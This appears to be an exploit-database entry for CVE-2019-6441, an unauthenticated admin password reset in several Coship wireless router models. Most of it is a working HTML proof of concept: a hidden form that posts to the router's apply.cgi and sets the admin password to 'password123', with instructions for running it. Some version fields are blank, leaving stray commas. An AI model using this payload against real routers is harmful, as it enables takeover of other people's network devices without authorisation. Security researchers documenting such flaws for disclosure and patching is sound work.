Coship Wireless Router Unauthenticated Admin Password Reset

Coship Wireless Router versions,,,, and suffer from an unauthenticated admin password reset vulnerability.

MD5 | a1080fb54c0071344277d41b76eb1f52

# Exploit Title: Coship Wireless Router a Unauthenticated Admin Password Reset
# Date: 15.01.2019
# Exploit Author: Adithyan AK
# Vendor Homepage:
# Category: Hardware (Wifi Router)
# Affected Versions : Coship RT3052 -, Coship RT3050 -, Coship WM3300 -, Coship WM3300 -, Coship RT7620 -
# Tested on: MacOS Mojave v.10.14
# CVE: CVE-2019-6441

# Change the X.X.X.X in poc to Router Gateway address and save the below code as Exploit.html
# Open Exploit.html with your Browser
# Click on aSubmit requesta
# Password of the admin will now be changed as "password123"

# PoC :

<!-- Change the X.X.X.X with the router's IP address -->
<script>history.pushState('', '', '/')</script>
<form action="http://X.X.X.X/apply.cgi" method="POST">
<input type="hidden" name="page" value="regx/management/accounts.asp" />
<input type="hidden" name="http_username" value="admin" />
<input type="hidden" name="http_passwd" value="password123" />
<input type="hidden" name="usr_confirm_password" value="password123" />
<input type="hidden" name="action" value="Submit" />
<input type="submit" value="Submit request" />

Related Posts